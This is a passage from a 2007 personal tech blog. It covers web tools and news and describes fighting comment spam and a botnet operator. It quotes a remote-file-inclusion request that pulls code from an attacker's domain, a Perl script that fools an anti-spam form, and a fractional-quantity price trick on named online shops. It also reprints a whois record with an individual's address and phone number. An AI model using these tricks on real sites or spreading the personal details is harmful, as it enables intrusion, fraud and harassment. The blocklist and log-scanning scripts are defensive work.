Keeping track of appointments is a Good Thing™ yet keeping your "things to do" in order is quite essential too. Like 30Boxes, HiveMinder comes with a CLI tool as well and how can I choose another to-do list site over a Perl based site like HiveMinder?

Yahoo! Mail

Webmail

Do I really have to explain this one? Yahoo! Mail has been around for centuries now and probably won't leave us anytime soon. Always good to have a backup mail account when my own server breaks down (which happens more than I like...). Besides, people tend to remember better, and make fewer mistakes with yahoo.com than b10m.net.

Del.icio.us

Bookmarks anywhere you like

I like to have access to my bookmarks anywhere in the world. Del.icio.us helps you organize your precious bookmarks and store them on a central server. Yeah, another Yahoo! tool ... guess I like that company ;-)

Inbox.com

Webmail

Can one have too many email addresses? Inbox.com offers POP3 access, making it easy to suck it into my beloved mutt

BigContacts

Online Addressbook

I haven't fully checked out this service and I do have to say the layout doesn't attract me at all, yet like the calendar dilemma, I think I finally found somewhat of a solution. The site offers API access (I'm still waiting for my API keys guys!) so someday I'll hack up a Perl module for that. More CLI tools!

ImageShack

Host those pictures for me

I'd rather not mess up my Flickr account with screenshots and other useless images, so I just dump them on ImageShack. Easy to upload and a rather reliable site.

Ipoo

Disposable email

Ipoo does the same as Mailinator, or DodgeIt. Collect email you care about for about a minute. The difference is that it's less known and therefore the speed of receiving mail is nice (unlike the other two mentioned, where sometimes you have to wait very long).

TinyURL

Snip those long URLs

Long URLs are annoying in emails, instant messaging let alone remembering! So whenever I have a long URL (or the URL is spoiling the joke), I run it through tinyurl.

B10mPad

Spamming my own tool

B10mPad lets you dump some text. That's it. Sometimes configuration files, snippets of code etc. need to be shared with someone. B10mPad helps me (hence I wrote it). But of course you can also use (and probably should, for it's probably better) Scribble.

What am I missing here? Feel free to leave your comments!

Posted by: B10m | permanent link | comments (1)

Nu Flash Video

2007/05/21 filed under /software

Nu.nl is the main Dutch news website and every now and then, they offer video streams too. Too bad for people running Linux without a functional FireFox mplayer-plugin (that means you, Joffie ;-)

For lazy people like Joffie and me, I've created Nu Flash Video. Usage is rather simple. Install the greasemonkey script and simply click on the "Bekijk video" links on nu.nl. That will redirect you to this page, where we will download and convert the video for you (if not done already).

Posted by: B10m | permanent link | comments (2)

More header images

2007/05/20 filed under /blog

After my short city trip to Paris, I've decided to generate some more header images for this blog. If you're lucky (and aren't reading the RSS feed) you see one on top of the screen now!

The ones I've created are these. Click on the images to see the original (at Flickr).







Posted by: B10m | permanent link | comments (2)

Fattest people live in Grunn

2007/05/18 filed under /news

I just read the news that a survey pointed out that the fattest people (of the Netherlands) live in Groningen.

I guess the large student population is to blame and especially the evil coeducational student club Albertus. They're known for converting beautiful girls into fat women ;-)

Let's all condole BOK ...

Posted by: B10m | permanent link | comments (3)

Amsterdam, Brazil

2007/04/27 filed under /web

Many people know I dislike anything Google related. For everything, there's usually a better alternative. Google Search? Yahoo and Clusty! Picasa? Flickr! Gmail ? Mutt! Reader? Bloglines!

And the list goes on...

One thing I hate to admit though, is that Google Maps by far is superior to Yahoo Maps

Today I was looking at upcoming.org (another Yahoo product I don't care about ;-) and noticed an event (ApacheCon) in Amsterdam.

Now, I know where the Piet Heinkade in Amsterdam is, yet I wanted to see if Yahoo Maps finally improved a little. Unfortunately, Yahoo Maps would direct me to Brazil...

Of course Google Maps showed me the right country, the right city and right street.

Yahoo, please get better maps and better search filtering ;-)

Posted by: B10m | permanent link | comments (1)

Form Spam Bot Blocker

2007/04/25 filed under /php, /perl

Freshmeat announced a new PHP class today (well, it's version 0.2 so it's not that new actually).

Anyways, a class named Form Spam Bot Blocker simply has to be cool so I gave it a shot. See if it is really good. Unfortunately (and completely predicted), it's not that good.

A few lines of Perl code were enough to fool the example shipped with the class.

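#!/usr/bin/perl -w

use strict;
use WWW::Mechanize::Sleepy;

# Sleep between requests, so the form is not submitted right after loading
my $mech = WWW::Mechanize::Sleepy->new(sleep => 5);
$mech->get('http://...../example.php');
$mech->form_number(1);   # select the first form on the page
$mech->submit;

print $mech->content;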

And the results:

This was a VALID submission. Your message is: some text

I have to admit that slowing down the input could prevent the dumbest bots out there, yet I believe most spam bots have no problems waiting a few seconds before posting.

Posted by: B10m | permanent link | comments (0)

Invitr

2007/04/23 filed under /web

Today I've launched a new Flickr service, called Invitr.

Invitr allows you to send photos marked only for friends/family or private to anyone with an email address. If you have a Flickr account, you might want to give it a try someday.

Anyways, here's a screenshot (or as BOK likes to call it, a screamshot)

Posted by: B10m | permanent link | comments (2)

One year anniversary

2007/04/10 filed under /personal

A year (and a day) ago, I got married for the first time (yeah, got married twice, to the same woman! (two different countries)). This happened in Indonesia. Can't believe already a year (and a day) has passed. I guess time just flies.

Anyways, here's a pic to remember this event by!

Up to June 6th, my second wedding day !

Posted by: B10m | permanent link | comments (1)

HDD crash

2007/04/04 filed under /personal

Yesterday, like many times before, my server was unreachable. I suspected it crashed due to some faulty hardware (like before) and that a simple fsck (with some forced mounting) would do the trick. Nevertheless, I got bored with this behavior and decided to get myself a new hard drive.

After buying a smacking 250GB (do they even get smaller nowadays?) disk, I found out the old disk was completely screwed up. /etc/ was no longer, and thus booting would become a little tricky.

Many hours passed in which I've learned all the beauty of different IDE cables (turned out I was using an old one and of course that was stupid with a drive bigger than 137 (?) GB), the beauty of not having a CD player attached to it and only one floppy disk, while four are needed. Finally, after way too many hours, I managed to get FreeBSD 6.2 installed (see, BOK, eventually I get up to date ;-)

God bless FreeBSD for storing the most important config files in /usr/local/etc/, rather than the disappeared /etc/! I was also rather pleased to find 99% of my /home/ directory accessible.

So, a lot of cursing, scanning the net, messing with my servboard and installing half CPAN again (I even got Plagger running again, so yeah, half CPAN (thanks Tatsuhiko!)). I'm finally back in the game (except for this insane blog and Apache2 not liking my precious and devious settings all the way)!

Posted by: B10m | permanent link | comments (3)

Fun with online stores

2007/03/30 filed under /web

Online shopping is getting more and more popular, but how much fun can you have with online shops? A shopping cart in which you can dump the items you want to buy can be really fun! Let's look at a few random results.

First I'd like to show you mijnwinkel.nl (translation: myshop.nl). This website offers you an easy way to setup your own shop. A keyword on the site that caught my attention, was "reliable service". They claim to host more than 1000 shops and all of them suffer from the same error, the incorrect shopping cart! Let's look at an example shop: Veronica (a Dutch TV Channel). Imagine you want to buy the "Denver Music Centre". They will charge you € 149.00 (non-members).

Too expensive! Let's order 0.01 Denver Music Centres!

Now we pay 1.49, much better!

As mentioned, this bug applies to all of the mijnwinkel.nl shops (like ANWB, OV9292, Nyenrode, and TU Delft).

Ok, so that's fun. Let's find some more. What about this merchant ? Do we get a refund with our goods?

Fun stuff ;-)

Of course Joffie pointed such things out to me years ago, but it's fun to see it still works.

Posted by: B10m | permanent link | comments (0)

Usability and last names

2007/03/27 filed under /web

Every now and then I read up on some usability tips and now I give one to the website building world! Of course I'm not entirely original, Adam Kalsey gave a hint already, but I like to stress the point.

Adam points out the following (well, quoting Paul Scrivens, but his website is (currently?) not available):

He suggests using a single name field instead of separating first name from last name unless you really need the names separated. The problem with this is that you never know what future uses you might have for that data. If you don't make sure it's in a format you can use, it's useless.

Why do I care? Well, my mother-in-law is soon visiting my country. She's Javanese, and as Wikipedia tells you Javanese (amongst others) don't use family (last) names!

Booking online flights is almost impossible, for the first and last name are always mandatory! So to get things straightened out, I have to call the airline to make sure how to bypass their too strict website (usually a dot or slash is ok, sometimes the "helpdesk" manually can change stuff).

So, if you're going to design a signup form, ask yourself the question: "is it really necessary for me to get a first and last name, or can one field (full name) do as well?".

The Javanese people (and the non-Javanese, but planning for Javanese people) will be very thankful!

Posted by: B10m | permanent link | comments (0)

Google recruitment spam

2007/03/20 filed under /personal

Last night, I received a mail from Stanley Go, a technical recruiter for Google. They were checking to see whether I was interested in a job with Google or not.

"Finally!", I thought. After all, BOK was contacted by the evil empire over a year ago!

It was just funny though. I'm not listed anywhere as looking for a job, as far as I remember, and the email looked extremely canned. Let's have a look at (parts) of it:

I found your information online on your homepage and see that you are an experienced Perl software developer with many distributions from Acme::Terror::NL to Webservice::LastFM::SimilarArtists. Your experience with coding and software development might be a good fit the Google.com engineering team.

Now, the email was sent to my CPAN account, which looked odd to me to begin with. I only get my Perl modules' bugs and patches on that account (and spam, occasionally).

Let's continue:

With your background and knowledge in software development, I feel that your skill set would be a good match with the Google.com team.

Based on a few modules he can judge my background and knowledge? C'mon! Especially after last week's Dutch Perl Workshop I do not consider my Perl knowledge that good.

This must be a joke, I figured and started looking at the links in the mail. They all linked to the real google.com site. Mmmm, headers? Sure enough it looks like it's coming from Google. It hits a few google corp relays.

Unlike Lee, who wrote about a similar mail, I think this is the lowest kind of recruitment, for it's simply canned spam. Maybe my first assignment at Google would be to write a script to send out even more emails to Python, Ruby and other programmers? ;-)

If they did take time to learn about the people they contact, as Lee claims, they would have found my posts on google eq evil

Shame on you spammers! Shame on you google!

Posted by: B10m | permanent link | comments (3)

Mr. Pak

2007/03/13 filed under /news

My country is plagued with free newspapers. The train stations are flooded by three free newspapers, being De Pers, Spits, and Metro.

The first one claims to be a quality newspaper, while the latter two are just plain horrible and I refused to read them for a while now. Today, however, I decided to give the Metro paper another chance, and unfortunately, it was the last time.

In Indonesia, addressing another human being always goes hand in hand with polite forms. Females are addressed with mbak, or ibu (depending on the age), males with mas or bapak (also depending on the age of the man).

These polite forms go far. Husbands and wives use these "titles", even brothers and sisters. Therefore, almost every one calls me mas (I'm not so old yet ;-) or bapak (or bule which refers to my skin color (white) and being a foreigner).

Today, the Metro paper posted an article about a tragic event about a woman poisoning her four kids and herself, out of money problems. This she apparently recorded with her cell phone.

The article is in Dutch, so I'll translate just a phrase:

In a goodbye letter to her husband Pak, the woman wrote: "Pak, the money is gone. I took the kids to show them heaven".

The name of the husband is not Pak! That's just the abbreviation of Bapak!

As it turns out, the Metro "journalists" just copy news and add their own incorrect conclusions. That's it Metro, now I will stop reading your paper ... again.

Posted by: B10m | permanent link | comments (0)

How does "30 Boxes" run?

2007/03/10 filed under /web

I bet a lot of geeks like me are curious what it takes to launch and manage a successful website. To answer these questions, I'll contact the owners of such websites and just ask them :-)

Today, the first episode about: 30 Boxes (which is also one of my favourite websites at the moment). 30 Boxes offers users a calendar system that is rather quite impressive. Usability seems to be the main goal, which results in an intuitive calendar that actually makes it fun to update. Add some command line scripts to it and you can say you have a successful website!

They host their servers at The Planet (or so it seems).

Nick of 30boxes.com was so kind to answer the following questions:

1. When did you start with 30 Boxes and what made you think of this idea?
The three of us (Narendra, Julie, and myself) had the simple need of seeing each other's calendar to schedule social things and vacations together, and we needed on-line access so we could see them from anywhere (work, phones, friends' houses, etc).

2. Google's 'tag-line' is "don't be evil", what is yours?
"It's Your Life" is the primary tagline. Sometimes we use "Life inside a box isn't all bad".

3. How many people are currently involved in operating this service?
3

4. How many users (approximately) do you currently have?
85,000

5. How much bandwidth would you say your users generate?
Don't know.

6. What is used for operating your site (amount of servers, operating systems, CPU/RAM, programming languages.)?
2 quad-proc Intel servers with 2GB ram each.

7. What made you choose the programming language(s) you're currently using?
PHP, Mysql, Linux. Free, enormous support available. Easy to use.

8. What are the future plans for 30 Boxes?
We have finished most of the product development we envisioned and will focus on gaining more users and collaborating with other services.


The fun part -to me- is that only 3 people can generate a product like this, which definitely blows away the competition (like Yahoo! and Google). Well done and keep it up!

Posted by: B10m | permanent link | comments (1)

Derby Dead Pool

2007/02/20 filed under /web

Joffie pointed out last night that his team is currently taking the lead in the infamous Derby Dead Pool.

The Derby Dead Pool is described as:

"The sickest site on the Internet...a ghoulish competition..."
"Arguably the world's most popular 'Dead Pool' competition"
"No-one gets hurt in this game of death"

I however would like to describe it as "a game for people who have way too much time on their hands", like Joffie ;-)

It's all about predicting who will die within a year. For each death you predicted, you get points. That is, the death must be mentioned in a British national newspaper or on the BBC News website. Extra points are credited for originality, unnatural causes, age of the celebrity and other things.

Too bad Joffie didn't list Geert Wilders, then again, it's not a wishlist ;-)

Joffie's team is called "Death from Above" which, if I recall correctly, had nothing to do with Marduk's song Baptism by Fire

Congrats Joffie, keep it up!

Posted by: B10m | permanent link | comments (0)

Yahoo Pipes

2007/02/09 filed under /web

Pipes is being hyped, so let's feed the hype a little.

When I first noticed the mail announcing pipes, I immediately thought: "This sounds a lot like Plagger" (a killer Perl app I should have blogged about before, sorry Tatsuhiko ;-)

Pipes does what Plagger does, only with a shiny web interface. As usual, I find eye candy fun for a second, but can never make them work ;-) So far, I have tried to create a "pipe" at Yahoo's version, without any result. With Plagger, on the other hand, I had my first example running in seconds (not counting installing half a terabyte on CPAN modules ;-)

What struck me most though, was the name. Pipes ... why pipes? Was it a direct theft from Plagger? After all, Plagger's tag line is "the UNIX pipe programming for Web 2.0". "This must piss Tatsuhiko off", I thought, but it looks like he's ok with it.

I'll have to let these pipes sink in a little. So far, I'm not too impressed by what I have seen, but since it's now up to the users, something cool might come out of this.

Posted by: B10m | permanent link | comments (5)

George Welling

2007/02/08 filed under /web

Every now and then, there's a need to find horrible songs from the past. Think Vanilla Ice, Kriss Kross, Jason Donovan, and many many others. I tried to top this by old Dutch songs, and went searching for "Brandend Zand", a Dutch song by Anneke Grönloh

But searching for just the title and "mp3" led me to the page of George Welling

Soon I realized this guy is awesome! Let's look at his page translated (by babelfish.yahoo.com).

First of all, the title of his CD is "Erg he", which is hard to translate, but I hope I can catch it with: "Bad, ain't it?". It's always good to see an artist who - unlike many rappers - thinks their music isn't all that. Ok, agreed, it's not the best singer ever, but neither is Wesley Willis (another one of my heroes).

The fun part of George's site though, is that you can browse each directory. That led me to his pictures of Indonesia

Those images are quite recent and it's funny to see him take almost the same trip as I did (I have never been to Aceh (?) nor to the top of the Bromo before though). Let's compare some pictures (I hope he doesn't mind me mirroring smaller copies of his images, if so, George, let me know and I'll remove them from my server!).

GeorgeMe

Now, for those who wondered. Here is the original Brandend Zand (by Anneke) and the cover by George

Posted by: B10m | permanent link | comments (1)

Jakarta Flooding

2007/02/05 filed under /news

As you undoubtedly have noticed by now, Indonesia is, once again, being tortured by Mother Nature. After a tsunami, many earthquakes, volcanic activity, we still lacked this act: flooding.

Flickr has some beautiful images on this:

What can you do besides waiting (and/or playing ?). I hope the water level soon drops, so normal life can be restored. Take care Jakarta!


Update: the first picture is not from this year's flooding, it's from 2006, but it's just too nice to remove ;-)

Posted by: B10m | permanent link | comments (4)

Yahoo Mail Beta blocks Linux users

2007/02/02 filed under /linux

Today I was surprised by Yahoo Mail. Usually, I can access the beta version without a problem, but for some reason, Yahoo deemed it necessary to block linux users. Why, oh why? It was working rather well!



The solution? Get MS Windows or a Mac. Yahoo, why hast thou forsaken us Linux users?


Update: another, simpler workaround is to use the User Agent Switcher Extension (and set it to FireFox 2.0, WinXP).

Posted by: B10m | permanent link | comments (0)

Comment Spam - again

2007/02/02 filed under /blog

Good blogger Bok noticed a major decrease in comment spam by blocking a single IP address. Of course, I had to see if this host was also spamming the heck out of my blog, but no. The IP address was not present in my logfiles, so I assume I'm still out of his/her reach.

Nevertheless, it got me thinking that blocking certain IPs might help stopping comment spam. I log the IP address and time stamp of each spam attack in a certain logfile (format: timestamp|IP address) so a list of top 10 offenders was easily created:

$ awk -F"|" '{ a[$2]++ } END { for (i in a) print a[i]":\t"i }' spammers.db  | \
  sort -n -r | head -10
604:    81.95.146.162
120:    69.46.16.231
74:     195.225.177.3
52:     85.255.119.74
50:     209.160.40.114
42:     72.36.226.10
41:     85.255.119.130
40:     66.36.229.227
35:     72.232.37.250
33:     75.126.21.163

I've added these addresses to my pf blocklist. Let's see if it'll work.

... why am I not surprised to see the ISP that refused to do anything about botnets at number 6?
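The same log can feed the pf blocklist directly. The script below is an added example, not the script used on this blog: it counts hits per address in a "timestamp|IP address" file, drops malformed lines and allowlisted addresses, and prints a pf table file. The function names, the threshold, the table name and the file path are assumptions, and the sample log is constructed.

```shell
#!/bin/sh
# Added example: build a pf table file from a "timestamp|IP" spam log.
# Table name, paths and thresholds are assumptions for illustration.

# count_offenders LOGFILE MIN_HITS
# Prints "count ip" for each well-formed IPv4 address logged at least
# MIN_HITS times, busiest first. Malformed lines are skipped, so nothing
# that is not a dotted quad can reach the firewall table.
count_offenders() {
    awk -F'|' -v min="$2" '
        NF != 2 { next }                                   # wrong field count
        $2 !~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ { next }  # not a dotted quad
        {
            split($2, octet, ".")
            for (i = 1; i <= 4; i++)
                if (octet[i] + 0 > 255) next               # octet out of range
            hits[$2]++
        }
        END {
            for (ip in hits)
                if (hits[ip] >= min + 0) print hits[ip], ip
        }
    ' "$1" | sort -k1,1nr -k2,2
}

# pf_table LOGFILE MIN_HITS "ALLOWED_IP ..."
# Prints one address per line, ready for a pf table file, leaving out every
# address on the allowlist (own hosts, monitoring, an upstream proxy).
pf_table() {
    count_offenders "$1" "$2" | awk -v allow="$3" '
        BEGIN {
            n = split(allow, a, " ")
            for (i = 1; i <= n; i++) keep[a[i]] = 1
        }
        !($2 in keep) { print $2 }
    '
}

# Constructed sample log; the addresses come from the documentation ranges.
write_sample_log() {
    cat > "$1" <<'EOF'
1170400000|203.0.113.7
1170400005|203.0.113.7
1170400010|203.0.113.7
1170400020|198.51.100.23
1170400030|198.51.100.23
1170400040|192.0.2.10
1170400050|192.0.2.10
1170400055|192.0.2.10
1170400060|999.1.1.1
1170400070|not-an-ip
1170400080
1170400090|203.0.113.7|extra
EOF
}

# Demo run: block everything seen twice or more, except our own 192.0.2.10.
log=$(mktemp)
write_sample_log "$log"
pf_table "$log" 2 "192.0.2.10"
rm -f "$log"

# pf.conf side (standard pf syntax; table name and path are assumptions):
#   table <spammers> persist file "/etc/pf.spammers"
#   block in quick from <spammers>
# Reload the table after regenerating the file:
#   pfctl -t spammers -T replace -f /etc/pf.spammers
```

The allowlist matters because comment forms are also posted from your own address while testing, and a count-based list would otherwise lock you out.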

Posted by: B10m | permanent link | comments (0)

Latihan Angka

2007/01/28 filed under /perl

After doing my homework for my Indonesian language course, I wondered if there was a module already that would transform numbers in the right written Indonesian equivalent. For instance, 10 would return sepuluh (= ten).

Of course it already exists and once again I didn't get to write a module for it. Instead, I wrote my little extra homework generator for it, being Latihan Angka 1, and Latihan Angka 2.

(for those curious, Latihan Angka means Number Practice)

Terima kasih, Steven Haryanto!

Posted by: B10m | permanent link | comments (2)

A talk with a Botnet script kiddie

2007/01/23 filed under /web

As mentioned before I've been obsessed with stopping botnets. Well, this one, operated by a script kiddie named "fazanul".

Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".

The attack this time was launched using a new host:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1

Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?

$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
  Creation Date........ 2007-01-23
  Registration Date.... 2007-01-23
  Expiry Date.......... 2008-01-23
  Organisation Name.... Stanley Livingston
  Organisation Address. 455 Rose Quartz Place
  Organisation Address. 
  Organisation Address. Castle Rock
  Organisation Address. 80108
  Organisation Address. CO
  Organisation Address. UNITED STATES

Admin Name........... Stanley Livingston
  Admin Address........ 455 Rose Quartz Place
  Admin Address........ 
  Admin Address........ Castle Rock
  Admin Address........ 80108
  Admin Address........ CO
  Admin Address........ UNITED STATES
  Admin Email.......... fazanul5004@yahoo.com
  Admin Phone.......... +1.9094813680
  Admin Fax............ 

Tech Name............ YahooDomains TechContact
  Tech Address......... 701 First Ave.
  Tech Address......... 
  Tech Address......... Sunnyvale
  Tech Address......... 94089
  Tech Address......... CA
  Tech Address......... UNITED STATES
  Tech Email........... domain.tech@YAHOO-INC.COM
  Tech Phone........... +1.6198813096
  Tech Fax............. 
  Name Server.......... yns1.yahoo.com
  Name Server.......... yns2.yahoo.com

You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.

$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)
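Requests like the one at the top of this post are easy to pick out of an access log, because a query parameter carries a complete remote URL. The script below is an added example, not part of the original post: it scans Apache combined-format lines and reports every parameter whose value starts with a URL scheme, plain or percent-encoded. The function names are assumptions, and the sample log is constructed (client addresses, dates and user agents are made up; only the first request line is the one quoted above).

```shell
#!/bin/sh
# Added example: flag requests whose query string passes a remote URL as a
# parameter value, the pattern of the include-path request quoted above.

# find_rfi LOGFILE
# Prints "client_ip<TAB>parameter<TAB>value" for each parameter whose value
# begins with http://, https:// or ftp://. Values are lower-cased and the
# escapes %3a and %2f are decoded first, so encoded schemes match as well.
find_rfi() {
    awk '
        {
            # The request line is the first double-quoted field.
            if (split($0, q, "\"") < 3) next
            if (split(q[2], req, " ") < 2) next
            uri = req[2]
            qpos = index(uri, "?")
            if (qpos == 0) next                # no query string at all
            n = split(substr(uri, qpos + 1), pair, "&")
            for (i = 1; i <= n; i++) {
                eq = index(pair[i], "=")
                if (eq == 0) continue
                name = substr(pair[i], 1, eq - 1)
                value = tolower(substr(pair[i], eq + 1))
                gsub(/%3a/, ":", value)
                gsub(/%2f/, "/", value)
                if (value ~ /^(https?|ftp):\/\//)
                    printf "%s\t%s\t%s\n", $1, name, value
            }
        }
    ' "$1"
}

# Constructed sample access log (combined format).
write_sample_access_log() {
    cat > "$1" <<'EOF'
203.0.113.50 - - [23/Jan/2007:10:00:00 +0100] "GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
198.51.100.9 - - [23/Jan/2007:10:01:00 +0100] "GET /index.php?page=HTTP%3A%2F%2Fexample.net%2Finc.txt HTTP/1.0" 200 512 "-" "-"
192.0.2.44 - - [23/Jan/2007:10:02:00 +0100] "GET /search?q=perl+modules&lang=en HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.44 - - [23/Jan/2007:10:03:00 +0100] "GET /blog/ HTTP/1.1" 200 3240 "http://example.org/?ref=http://example.com/" "Mozilla/5.0"
garbage line without a quoted request
EOF
}

# Demo run over the constructed log: two hits expected, the referer on the
# fourth line is ignored because only the request URI is inspected.
log=$(mktemp)
write_sample_access_log "$log"
find_rfi "$log"
rm -f "$log"
```

A hit only shows that a request tried this; parameters that legitimately carry URLs, such as a redirect target, will match too and need an allowlist.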

So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, yet this time the channel #out. Let's login, and why not use the nickname Sorin (remember? ;-)

Here's what happened... enjoy (the red comments are added by me later)

<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I
          believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl
          scripts look like crappy cut'n'paste jobs, not showing too much
          knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack
          Yahoo's Domain Registry service. Sweet
<fazanul> lollll

Yeah right ... he's registering domains through Yahoo himself now?

<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man 
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those
          too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop

Did he just ask me to *stop* attacking his botnets?!?

<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more
          successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't
          know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net
          <212.238.141.98>, most likely the domain you've tried to reach
          too.
[snipped more info from mail.b10m.net here]

I logged in the IRC channel, from this machine (mail.b10m.net). 
He was clever enough to look that up. Unfortunately for him, 
the attacks are *not* launched on this vhost ;-)

Anyways, now we know *his* IP address: 

212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 
"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) 
Gecko/20061206 Firefox/1.5.0.9"


<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net
          <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha

Funny, he actually pointed me out to a typo. That IP address *used* to